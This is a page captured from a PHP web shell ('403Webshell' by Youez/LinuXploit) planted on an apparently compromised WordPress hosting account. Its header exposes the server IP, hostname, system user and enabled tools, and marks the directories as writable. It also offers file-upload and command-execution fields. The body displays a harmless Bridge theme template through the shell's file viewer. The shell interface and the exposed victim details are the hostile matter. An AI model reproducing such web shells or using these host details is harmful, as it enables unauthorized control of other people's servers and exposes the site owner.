403Webshell
Server IP : 54.36.91.62  /  Your IP : 216.73.216.15
Web Server : Apache
System : Linux webm021.cluster127.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
User : uxhactp ( 169076)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/uxhactp/www/wp-content/themes/bridge/vc_templates/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/uxhactp/www/wp-content/themes/bridge/vc_templates/vc_empty_space.php
<?php
if(version_compare(qode_get_vc_version(), '4.6.2') >= 0) {
	$height = $el_class = $background_image = $image_repeat = '';
	$atts = vc_map_get_attributes($this->getShortcode(), $atts);
	extract($atts);
} else {
	extract( shortcode_atts( array(
		'height' => WPBMap::getParam( 'vc_empty_space', 'height' ),
		'el_class' => '',
		'background_image' => '',
		'image_repeat' => ''
	), $atts ) );
}
$class = "vc_empty_space ";

$pattern = '/^(\d*(?:\.\d+)?)\s*(px|\%|in|cm|mm|em|rem|ex|pt|pc|vw|vh|vmin|vmax)?$/';
// allowed metrics: http://www.w3schools.com/cssref/css_units.asp
$regexr = preg_match( $pattern, $height, $matches );
$value = isset( $matches[1] ) ? (float) $matches[1] : (float) WPBMap::getParam( 'vc_empty_space', 'height' );
$unit = isset( $matches[2] ) ? $matches[2] : 'px';
$height = $value . $unit;

$inline_css = ( (float) $height >= 0.0 ) ? ' style="height: ' . $height . '"' : '';


if(version_compare(qode_get_vc_version(), '4.7.4') >= 0) {
	$class = 'vc_empty_space ' . $this->getExtraClass( $el_class ). vc_shortcode_custom_css_class( $css, ' ' );
} else {
	$class .= $this->getExtraClass( $el_class );
}
$css_class = apply_filters( VC_SHORTCODE_CUSTOM_CSS_FILTER_TAG, $class, $this->settings['base'], $atts );

$image = "";
if($background_image != ""){
	if (is_numeric($background_image)) {
		$image_src = wp_get_attachment_url($background_image);
	}
	$image .= 'style="background-image:url('.$image_src.');';
	if ($image_repeat != ""){
		$image .= 'background-repeat:'.$image_repeat.';"';
	}
}
?>
	<div class="<?php echo esc_attr( trim( $css_class ) ); ?>" <?php echo $inline_css; ?> ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image" <?php echo $image;?> ></span>
		</span></div>
<?php echo $this->endBlockComment( 'empty_space' ) . "\n";

Youez - 2016 - github.com/yon3zu
LinuXploit